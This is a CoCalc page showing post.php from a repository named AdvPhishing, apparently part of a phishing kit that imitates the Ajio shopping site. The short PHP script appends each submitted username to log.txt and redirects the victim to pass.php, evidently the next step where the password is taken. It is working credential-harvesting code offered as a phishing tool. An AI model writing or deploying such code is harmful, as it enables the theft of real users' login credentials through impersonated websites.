Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
Ignitetch
GitHub Repository: Ignitetch/AdvPhishing
Path: blob/master/sites/ajio/post.php
1655 views
1
<?php
2
3
file_put_contents("log.txt", "Username: " . $_POST['username'] . "\n", FILE_APPEND);
4
header('Location: pass.php');
5
exit();
6